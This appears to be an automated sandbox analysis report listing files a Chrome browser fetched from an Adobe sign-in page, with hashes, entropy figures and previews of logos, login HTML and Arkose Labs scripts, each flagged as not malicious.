                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/round/facebook.svg
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 16 16">. <path id="new_facebook_logo" data-name="new facebook logo" d="M16,8.049A8,8,0,1,0,6.75,16V10.376H4.719V8.049H6.75V6.276A2.832,2.832,0,0,1,9.772,3.144a12.235,12.235,0,0,1,1.791.157V5.282H10.554A1.16,1.16,0,0,0,9.25,6.54V8.049h2.219l-.355,2.327H9.25V16A8.036,8.036,0,0,0,16,8.049Z" fill="#1877F2"/>.</svg>.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2465
                                                                                                      Entropy (8bit):7.853932542742166
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ny3UQqickfo8MoVresug8WZXDu203J2T+Xpy+V/cVnbGd+5/ps9EmTQGIY+wjYIH:OBcOouesucZXDSZeg0A/cVnSjTYjHIH
                                                                                                      MD5:4EDEBE50E0322D9C9A18AE9545CA6EAF
                                                                                                      SHA1:0ED972660ABDE62E2D000854B912412AA16B73CD
                                                                                                      SHA-256:055B86BAC8B7E6902F4CCE2FF8C77D055CB439F2F94E9C784C968A0F9A5FD7EF
                                                                                                      SHA-512:F96EB6083C7733B4171F4A56D0E6B729F46FAB74CE090F351F485CDFC7C9164126F5D2EEB90931E09E89B7C6365120C4767E5C28FCC0C3FAEF4A0222601AD150
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/f_logo_RGB-Blue_58.png
                                                                                                      Preview:.PNG........IHDR.....................pHYs..........&.?...SIDATx..]h\E..gw...t.I[Zo.t+>.-$..(.l.........D...*.BSE..!...G..RH..IM^.R..*..m.Z...f...cWf{...;w...3...,.vv..;.=s...9.F.A.$..;.4A! MP.H....+...(T....<..!}.....|..e...H.."....9.'4%....P...m{.0o.K.D.|.......h...Q..o.0...h.c.>...b..+.VB0.Uj...C./.I....x.Z..(T...?.4....T..........a..*...2NEQ...T.8.....#.A..LdD5A(%...FBb.:1..Pb.PB.0......J...../$P!.0@o..Lc.(Q.(.."0!@.o,".]N.p!=...Z.Q.R+.3...Z.).*.".".P0.A_.).w...HI...|*.SB../.S.2...!..p.E...w...7......L..Y....|u..)D.xg.o'.7.`....y.i@.P.. |../..,..@<i....Y.E@.@..}....E ....'.....82(.y.@.^.B..P.\....v.Izc.y.|.N.j.....z)J.3.l ..d.<.......G.$V.n..^.YY#..........z.B....B=y.f.\.Yg>..bj...,..P...2....k...Yzhg|'.(.....>.....6:.........XJ....?........I..|.D.....kv.,..$j...$..'6W...I..te..7r...E.O..8...M$.....=.6..jh.!A..!u..|k.....F.q5D.....YO...2..`..{.p,.....b.r...u.ut$...'ZB}........Z.mO............;......5.~../%+LC.qd..X.m....J...N.m.l.Awk@#.LC4.m..Z.....
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1018
                                                                                                      Entropy (8bit):4.9180707096242395
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tbMB0N6bJK+I6Ng9naR3n8BoDU/pfSXajb2X32Md/xWMd/qoMdjI:wvbJK+ImgdaR8oCpfL83Bd/xhd/qfdM
                                                                                                      MD5:2F5B6831B8B9863CA44D4C84427D55DB
                                                                                                      SHA1:041110F845CAD77582A009481BACB70EFDAC73E9
                                                                                                      SHA-256:D295C74ADFAD84A0D7C3E720A70126A7405B396D20A61CE25D1D67266D672E11
                                                                                                      SHA-512:5858F6D6224B27E6749E8D876F5FB956ECA710038E1D21AE43D740E6BF6B64EAC1EB91B79E6F266B8E78C62C2B5E07FC560E8847AA65ACF711CAA382476A63F0
                                                                                                      Malicious:false
                                                                                                      Preview:<svg id="production" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 32 32">. <defs>. <style>. .cls-1 {. fill: #4b4b4b;. }. </style>. </defs>. <title>Artboard 68</title>. <path class="cls-1" d="M17.99316,30.06445a1.98415,1.98415,0,0,1-1.48828-.67383L10.82422,23H5.05957A5.0659,5.0659,0,0,1,0,17.93945V7.05957A5.06506,5.06506,0,0,1,5.05957,2H26.93994A5.06548,5.06548,0,0,1,32,7.05957V17.93945A5.06632,5.06632,0,0,1,26.93994,23H20v5.0625a1.98517,1.98517,0,0,1-1.28955,1.86914A2.00829,2.00829,0,0,1,17.99316,30.06445ZM5.05957,4A3.06278,3.06278,0,0,0,2,7.05957V17.93945A3.06361,3.06361,0,0,0,5.05957,21h6.21387a.99954.99954,0,0,1,.74756.33594L18,28.0625V22a.99974.99974,0,0,1,1-1h7.93994A3.06372,3.06372,0,0,0,30,17.93945V7.05957A3.06288,3.06288,0,0,0,26.93994,4Z"/>. <g>. <circle class="cls-1" cx="9.70414" cy="12.5" r="2.09862"/>. <circle class="cls-1" cx="16" cy="12.5" r="2.09862"/>. <circle class="cls-1" cx="22.29586" cy="12.5" r="2.09862
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2385
                                                                                                      Entropy (8bit):4.552627667062907
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:H/x7RIelK6eG0UPR/6OJz7fOn6WtTZeIdzKLj6RtAFmALWmc5nvq6GwhJwjwAg:J7R5EDLUPR/Zz7Gn59xe6tfu+qPaym
                                                                                                      MD5:E36799E0084267AA804E9B470DE17094
                                                                                                      SHA1:C15770F1FAADE2A58003BA8D3E34940621987DE2
                                                                                                      SHA-256:6BD8880193131672D32517ED1EA30CF871F317B9A62F523F67B8A3B34CAF1722
                                                                                                      SHA-512:C3DF0BD86D66A78DC46161D0E5B10802D6E9C34102E8743EA600F995D1018F30B314275D6BE9195937AA24F62FB452D2FA5C61916E72A81CD902808464BC72EB
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/generic/adobe_logo_black.svg
                                                                                                      Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" width='70' height='18' viewBox="0 0 453.75 118.11" focusable='false'>. <path. d="M202,85.26l-4.89,15.08a1.1,1.1,0,0,1-1.12.82H184.12c-.71,0-.92-.41-.81-1L203.7,41.31a18.89,18.89,0,0,0,1-6.22.68.68,0,0,1,.61-.71h16.31c.51,0,.71.1.82.61l23.14,65.25c.2.51.1.92-.51.92H231.84a1,1,0,0,1-1.13-.71l-5.2-15.19Zm19.78-12.75c-2-6.73-6.12-19.06-8.05-26.3h-.1c-1.64,6.83-5.31,18-8,26.3Z". transform="translate(-6.07 -6.51)"/>. <path. d="M247.21,76.28c0-14.58,10.91-26.81,29.57-26.81.81,0,1.83.1,3.36.2V29.59a.64.64,0,0,1,.71-.71H293.7c.51,0,.61.2.61.61V89.74a56.68,56.68,0,0,0,.41,7.44c0,.51-.1.72-.71.92a51.21,51.21,0,0,1-20.09,4.08C258.83,102.18,247.21,93.62,247.21,76.28Zm32.93-14.47a10.53,10.53,0,0,0-3.77-.51c-7.85,0-14.58,4.79-14.58,14.27,0,10.09,5.81,14.48,13.56,14.48a14.38,14.38,0,0,0,4.79-.61Z". transform="translate(-6.07 -6.51)"/>. <path. d="M352.7,75.57c0,16-10.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1200, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):222975
                                                                                                      Entropy (8bit):7.978357450570736
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:qEae9vAOOU9DVq30kJ4ilupgLDwXZJyjgy59T:FxOyg30kJ4iAuLTjgy7
                                                                                                      MD5:EBB622283A008A598D5E51B3BCF74F13
                                                                                                      SHA1:5161619986CBBBABF1D772C72CFB6B84A38F5A42
                                                                                                      SHA-256:7864398D3C7F69CB529E871E89D1459CC385E8EBA6D2D4AB20117576770951E9
                                                                                                      SHA-512:30F8761974D46E601051BA9F764568C5E5687B17CB36891900C0AA195A1602966AE84C00FF8B022EA42A8650A925A48FC15941564A298413B7227D3F861E68D3
                                                                                                      Malicious:false
                                                                                                      Preview:......JFIF...........................................+......+&.%#%.&D5//5DNB>BN_UU_wqw................................+......+&.%#%.&D5//5DNB>BN_UU_wqw.............."..........4..................................................................)..2M....e.`.Fv.V(..+...Z#h...R...b0...L.0...2...R..j......0.P'.*.3......ug..Y.2.-&.P..M..,...f.=&.-...-....j#.<.YL.XZ[:.....R..-...[.,.7.e.jK....-(Qs..lV..2....T..6...@..3.[..U.....;$.6Fl.F4P ..B.E.FQz.T`Q..qR`*....2...F.e.2.(..,.L..#*...M.......[*.../7......W/.6.k .&.0...2...Vi@.L9l..`...+2..h...2..V.XZM...`Ue)h...(.52.3*...L..Q.....YXZL.PfV...0...-)te.T.......^..n.`.K(.@[N.X......P..4....i.#E...UT.F`..U.VR..NUa.Y.B.iVt...z...eY.,h.t.,K..5.RleZLk(g-.....3.4Z...EE.X....B.c*..E'i..2.c+..Q..e@(*.2..(..a........+"...=....z...,1.....gZ....r:9....x..?S.ec.T.a.e.XV.P..g..@....PT.de)J-(.DT`..i1.`..h+....X-&0.RmC...+(...#.3SEh-&.@.R,...@...-Zz.bRhZ,.Uj.g....FQU.`.!6.h.....l..J.E.i.*..gH..YV.e`...h..j-.dV.....Z*..*.h..M..h.\.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):271160
                                                                                                      Entropy (8bit):5.547687723035138
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:GVeF/OwGRgA1PCpk8rD9VJx1SIjGdQh1R6mX4:GVeflP1SGB9o
                                                                                                      MD5:5C52574099F1BE17250D9127E3A8D515
                                                                                                      SHA1:F06867CAD1359342F70C3CB1368E7AABE10B74E3
                                                                                                      SHA-256:71ED066BA926C37EFB9E2A351119BD6089C0C31AC32A3E64BB842EC6B0109FA9
                                                                                                      SHA-512:C2C114FEB2DE378816BF351F7F5CBBBB3C2155D239A383A6B5D1F71E88871186AA59A8FF9E081524B8D35D192C05BACF763FB84E69C76E49680972F6E2DEF126
                                                                                                      Malicious:false
                                                                                                      Preview:var arkoseLabsClientApi7f09c9f9;!function(){var t,e,n,r,o={1891:function(t,e){"use strict";e.J=void 0;var n=/^([^\w]*)(javascript|data|vbscript)/im,r=/&#(\w+)(^\w|;)?/g,o=/&tab;/gi,i=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,a=/^.+(:|&colon;)/gim,c=[".","/"];e.J=function(t){var e,u=(e=t||"",(e=e.replace(o,"&#9;")).replace(r,(function(t,e){return String.fromCharCode(e)}))).replace(i,"").trim();if(!u)return"about:blank";if(function(t){return c.indexOf(t[0])>-1}(u))return u;var s=u.match(a);if(!s)return u;var f=s[0];return n.test(f)?"about:blank":u}},8787:function(t,e){"use strict";function n(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function r(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function o(t,e,n){return e&&r(t.prototype,e),n&&r(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(t){return i=Object.setPr
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):392
                                                                                                      Entropy (8bit):5.080341403416466
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:t4NlfPGnR5e9EaV60EzDX0w2HbrmiFgxyaTbh:t4NlfPGnRw9EHWHbvgUafh
                                                                                                      MD5:AAEB95990783A7B42BEC3670F58E3FE0
                                                                                                      SHA1:6ACCE01366AA766DA036A30D1F806C0DE7B83672
                                                                                                      SHA-256:60A63C156DBCFE2188678E58F0357C23CB325E45B1B854C9DB9A1D47E091A38E
                                                                                                      SHA-512:E66DE7CE6DF64A9F2C3166B7C1176949DA1292316FFCC8119F1F3573F2A6A6C4D6F7E8993F00D2E31D94B0989663CE74C8EE5C0CA58FC2DE2C5B9C38B8B04780
                                                                                                      Malicious:false
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 16 16">. <path id="new_facebook_logo" data-name="new facebook logo" d="M16,8.049A8,8,0,1,0,6.75,16V10.376H4.719V8.049H6.75V6.276A2.832,2.832,0,0,1,9.772,3.144a12.235,12.235,0,0,1,1.791.157V5.282H10.554A1.16,1.16,0,0,0,9.25,6.54V8.049h2.219l-.355,2.327H9.25V16A8.036,8.036,0,0,0,16,8.049Z" fill="#1877F2"/>.</svg>.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1288
                                                                                                      Entropy (8bit):5.003353448492329
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2dkLxsN6g4R+p6Epwta0J5vDwNK6nCHxhfJPmggvn/H0SSHmDFR3l4:csxK2WDaJ+whHhmggv/UUR36
                                                                                                      MD5:22C0F5D1D9486E8AECC35634DE0EBC51
                                                                                                      SHA1:81638BFBDCD5C1391F993041E23CE2EC55407774
                                                                                                      SHA-256:BFE117A5846194E309FEB56EA18137CBF5C8080B5D5DB2FC4ECA8E3B3B09C617
                                                                                                      SHA-512:F79D173467CE83525FB6504E337B82CB6BB8E845F48ADDA0D1ACB68033C95BFC7BF93198BA2883DE997299756AEF7CB0F5899907B865986E938B63CDE5606EF7
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/sml-kakao-logo.svg
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 25 25">. <defs>. <style>. .cls-1 {. clip-path: url(#clippath);. }.. .cls-2 {. fill: none;. }.. .cls-2, .cls-3, .cls-4, .cls-5 {. stroke-width: 0px;. }.. .cls-6 {. mask: url(#mask);. }.. .cls-4 {. fill: #fee500;. }.. .cls-5 {. fill: #fff;. }. </style>. <clipPath id="clippath">. <rect class="cls-2" x="6.5" y="7.5" width="12" height="10"/>. </clipPath>. <mask id="mask" x="-37.14" y="-31.7" width="101.41" height="64.6" maskUnits="userSpaceOnUse">. <g id="mask0_523_4559" data-name="mask0 523 4559">. <path class="cls-5" d="m-37.14-31.7h101.41V32.9H-37.14V-31.7Z"/>. </g>. </mask>. </defs>. <rect class="cls-4" x="0" y="0" width="25" height="25" rx="12.5" ry="12.5"/>. <g class="cls-1">.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2465
                                                                                                      Entropy (8bit):7.853932542742166
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ny3UQqickfo8MoVresug8WZXDu203J2T+Xpy+V/cVnbGd+5/ps9EmTQGIY+wjYIH:OBcOouesucZXDSZeg0A/cVnSjTYjHIH
                                                                                                      MD5:4EDEBE50E0322D9C9A18AE9545CA6EAF
                                                                                                      SHA1:0ED972660ABDE62E2D000854B912412AA16B73CD
                                                                                                      SHA-256:055B86BAC8B7E6902F4CCE2FF8C77D055CB439F2F94E9C784C968A0F9A5FD7EF
                                                                                                      SHA-512:F96EB6083C7733B4171F4A56D0E6B729F46FAB74CE090F351F485CDFC7C9164126F5D2EEB90931E09E89B7C6365120C4767E5C28FCC0C3FAEF4A0222601AD150
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR.....................pHYs..........&.?...SIDATx..]h\E..gw...t.I[Zo.t+>.-$..(.l.........D...*.BSE..!...G..RH..IM^.R..*..m.Z...f...cWf{...;w...3...,.vv..;.=s...9.F.A.$..;.4A! MP.H....+...(T....<..!}.....|..e...H.."....9.'4%....P...m{.0o.K.D.|.......h...Q..o.0...h.c.>...b..+.VB0.Uj...C./.I....x.Z..(T...?.4....T..........a..*...2NEQ...T.8.....#.A..LdD5A(%...FBb.:1..Pb.PB.0......J...../$P!.0@o..Lc.(Q.(.."0!@.o,".]N.p!=...Z.Q.R+.3...Z.).*.".".P0.A_.).w...HI...|*.SB../.S.2...!..p.E...w...7......L..Y....|u..)D.xg.o'.7.`....y.i@.P.. |../..,..@<i....Y.E@.@..}....E ....'.....82(.y.@.^.B..P.\....v.Izc.y.|.N.j.....z)J.3.l ..d.<.......G.$V.n..^.YY#..........z.B....B=y.f.\.Yg>..bj...,..P...2....k...Yzhg|'.(.....>.....6:.........XJ....?........I..|.D.....kv.,..$j...$..'6W...I..te..7r...E.O..8...M$.....=.6..jh.!A..!u..|k.....F.q5D.....YO...2..`..{.p,.....b.r...u.ut$...'ZB}........Z.mO............;......5.~../%+LC.qd..X.m....J...N.m.l.Awk@#.LC4.m..Z.....
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):751
                                                                                                      Entropy (8bit):4.648170767212003
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:t4sBECSOn7QVP8B/HaqhAX7dU2SHalK3eRVnzKmQweoxGIJeJMcfNr77JBTyl1bj:t4sBjn7h1HaqAX7dtRK+Jz9eoxdJeJMZ
                                                                                                      MD5:A23D338C5AB2E6A2ECEAB9436B376308
                                                                                                      SHA1:45AE78B6650AA62FE93330806D5F5D430BF269B3
                                                                                                      SHA-256:F4B5AE2B108AC757F4EA43905CD55BE4816D65AE45CBF48FBE4AAB6AA1D6F92F
                                                                                                      SHA-512:FCAF93369A81BCE4B6441EEF3D294DE26CA5F8DFF34E63BA88BE0CA18ECB2C15097D5D26D64284CEEF00203B41EC6F87096697C493118DB6D7FDA49CE76B573B
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/apple.svg
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="26.034" height="32" viewBox="0 0 26.034 32"><g transform="translate(0 0)"><path d="M31.354,22.608a7.272,7.272,0,0,1,3.463-6.1,7.444,7.444,0,0,0-5.865-3.171c-2.468-.259-4.86,1.477-6.117,1.477-1.282,0-3.218-1.451-5.3-1.408a7.811,7.811,0,0,0-6.573,4.009c-2.842,4.921-.722,12.152,2,16.129,1.362,1.948,2.954,4.123,5.037,4.046,2.038-.085,2.8-1.3,5.26-1.3,2.438,0,3.152,1.3,5.277,1.251,2.187-.035,3.565-1.956,4.88-3.922a16.109,16.109,0,0,0,2.231-4.544,7.027,7.027,0,0,1-4.29-6.465Z" transform="translate(-9.609 -5.59)"/><path d="M23.551,12.976a7.16,7.16,0,0,0,1.638-5.13,7.285,7.285,0,0,0-4.714,2.439,6.813,6.813,0,0,0-1.681,4.94A6.024,6.024,0,0,0,23.551,12.976Z" transform="translate(-5.82 -7.847)"/></g></svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):76514
                                                                                                      Entropy (8bit):5.403501344051261
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:VwYgrDGMt2UMvCdjtY1nzumIL7qMYmyq9pgMtn7AerLe7cFcdDL:CY3bKFtwnjILRbyQp97AQLKcFcZ
                                                                                                      MD5:0469982717626E856617FDCEF5A5774E
                                                                                                      SHA1:FFB8E3B18DA53DA4772E151051B82B778BB01C14
                                                                                                      SHA-256:D04417312158FCC5BAC7889ADA9AC15F5490269D6633A6F6CF18F42DF569516C
                                                                                                      SHA-512:ED94A7BCA0C9A999BF6127A7F78948807351D1DCD10DD99B31E7FD6737697CF5D739D918C5175317B6BC5150BAD3798EF383AEC713FBCBB46C689ECDDB0CE130
                                                                                                      Malicious:false
                                                                                                      Preview:var arkoseLabsClientApi7f09c9f9;!function(){var e={1891:function(e,t){"use strict";t.J=void 0;var n=/^([^\w]*)(javascript|data|vbscript)/im,r=/&#(\w+)(^\w|;)?/g,o=/&tab;/gi,i=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,a=/^.+(:|&colon;)/gim,c=[".","/"];t.J=function(e){var t,s=(t=e||"",(t=t.replace(o,"&#9;")).replace(r,(function(e,t){return String.fromCharCode(t)}))).replace(i,"").trim();if(!s)return"about:blank";if(function(e){return c.indexOf(e[0])>-1}(s))return s;var u=s.match(a);if(!u)return s;var l=u[0];return n.test(l)?"about:blank":s}},7040:function(e,t){var n;!function(){"use strict";var r={}.hasOwnProperty;function o(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var i=typeof n;if("string"===i||"number"===i)e.push(n);else if(Array.isArray(n)){if(n.length){var a=o.apply(null,n);a&&e.push(a)}}else if("object"===i)if(n.toString===Object.prototype.toString)for(var c in n)r.call(n,c)&&n[c]&&e.push(c);else e.push(n.toString())}}return e.join(" ")}e.expor
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (28511)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):62612
                                                                                                      Entropy (8bit):5.2991976192212675
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:RJSavMyhYuR7WHS0pxGcVI53x+bsKbAx+bsKbjtTmvQi/XtTmvQi/7jRPEh7iCqs:R2yhYuMHS0hVRoaSgC0VC
                                                                                                      MD5:BEB73E5BF986FA12C7B768FA97DC8F2B
                                                                                                      SHA1:A72E87B14EFBD800E40137D7F890C3AA9F3A2165
                                                                                                      SHA-256:65A8482903C810DFCA260ED06CCC1A8F6881185796787F2415E280C4E7B8A7EF
                                                                                                      SHA-512:B850FFBEE8E4A261F4C659C2FC0B2219CDD75FB12FEF9C5F9AC2E2C8C2EFBE397A859490B239D3A15E58CDDED3D8F896901AD80A06052958EA74A76261DFC139
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%253Fdelegated_request_id%253D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%2526client_id%253DCC_HD_ESD_WEB%2526deeplink%253Ddelegation%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&relay=ebe19fea-e642-481c-8848-612d91fcff8f&locale=en_US&flow_type=code&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=code&code_challenge_method=plain&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation&use_ms_for_expiry=true
                                                                                                      Preview:<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="Content-Security-Policy" content="base-uri 'self'; object-src 'none'; script-src 'self' 'unsafe-inline' 'report-sample' https://wwwimages2.stage.adobe.com https://auth-stg1.services.adobe.com https://kapture.corp.adobe.com https://stage-server.messaging.adobe.com https://wwwimages2.adobe.com https://c.evidon.com https://auth.services.adobe.com https://cdn.arkoselabs.com https://auth-ci-statics.dev.services.adobe.com https://assets.adobedtm.com https://www.adobe.com/marketingtech/ https://use.typekit.net https://www.google.com/recaptcha/ https://www.recaptcha.net https://recaptcha.net https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://api.demandbase.com https://adobe-api.arkoselabs.com https://accounts.google.com/gsi/ https://www.adobe.com/etc.clientlibs/globalnav/ https://geo2.adobe.com/json/ https://cdn.cookielaw.org 'nonce-q3A43Stf4+NhWkVEgkFfpA==' 'sha256-qz5t9UkuvqqEypV44P1Kv4Is
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65297)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4256355
                                                                                                      Entropy (8bit):5.405364083343942
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:tOCiTfd2WSuLYHo0Uo4T3AAJn+qOQqTpb075vc:cCi7d2WSuLYHo0Uo4T3AAJn+3QqTpb0u
                                                                                                      MD5:8A56E23C7FCCD2F773B4AE59BAA81367
                                                                                                      SHA1:69C32593C66372D79205342CA40BD4AB35B66444
                                                                                                      SHA-256:9F86C194C3D3E01E2BB456D0C240AB8E72925A35D62698060C7EF6E98105B016
                                                                                                      SHA-512:D671242EA8B12B73961F59498CAFC7AEE86FAE90671840A718889463C2E6D3347C551CAFB344CD69712A398913EE8324D4E458684935101A01F65FE021EB8B08
                                                                                                      Malicious:false
                                                                                                      Preview:/*! For license information please see scripts.js.LICENSE.txt */.!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="/",r(r.s=575)}([function(e,t,r){"use
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):76514
                                                                                                      Entropy (8bit):5.403501344051261
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:VwYgrDGMt2UMvCdjtY1nzumIL7qMYmyq9pgMtn7AerLe7cFcdDL:CY3bKFtwnjILRbyQp97AQLKcFcZ
                                                                                                      MD5:0469982717626E856617FDCEF5A5774E
                                                                                                      SHA1:FFB8E3B18DA53DA4772E151051B82B778BB01C14
                                                                                                      SHA-256:D04417312158FCC5BAC7889ADA9AC15F5490269D6633A6F6CF18F42DF569516C
                                                                                                      SHA-512:ED94A7BCA0C9A999BF6127A7F78948807351D1DCD10DD99B31E7FD6737697CF5D739D918C5175317B6BC5150BAD3798EF383AEC713FBCBB46C689ECDDB0CE130
                                                                                                      Malicious:false
                                                                                                      URL:https://adobe-api.arkoselabs.com/v2/430FF2C3-1AB1-40B7-8BE7-44FC683FE02C/api.js
                                                                                                      Preview:var arkoseLabsClientApi7f09c9f9;!function(){var e={1891:function(e,t){"use strict";t.J=void 0;var n=/^([^\w]*)(javascript|data|vbscript)/im,r=/&#(\w+)(^\w|;)?/g,o=/&tab;/gi,i=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,a=/^.+(:|&colon;)/gim,c=[".","/"];t.J=function(e){var t,s=(t=e||"",(t=t.replace(o,"&#9;")).replace(r,(function(e,t){return String.fromCharCode(t)}))).replace(i,"").trim();if(!s)return"about:blank";if(function(e){return c.indexOf(e[0])>-1}(s))return s;var u=s.match(a);if(!u)return s;var l=u[0];return n.test(l)?"about:blank":s}},7040:function(e,t){var n;!function(){"use strict";var r={}.hasOwnProperty;function o(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var i=typeof n;if("string"===i||"number"===i)e.push(n);else if(Array.isArray(n)){if(n.length){var a=o.apply(null,n);a&&e.push(a)}}else if("object"===i)if(n.toString===Object.prototype.toString)for(var c in n)r.call(n,c)&&n[c]&&e.push(c);else e.push(n.toString())}}return e.join(" ")}e.expor
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Web Open Font Format (Version 2), CFF, length 29924, version 1.0
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):29924
                                                                                                      Entropy (8bit):7.990737514218301
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:Pcuh9wILHXO18MCDoDHbMfEgfLiEJt29V66Gryo3gjXep:Lh9wILHXO1JCDuofLbWyrnr
                                                                                                      MD5:FCFE600FE9BF0239A8C3CD48738EC2DA
                                                                                                      SHA1:C735EDEB5AC056F41E063A46B2F508057C9DBDAB
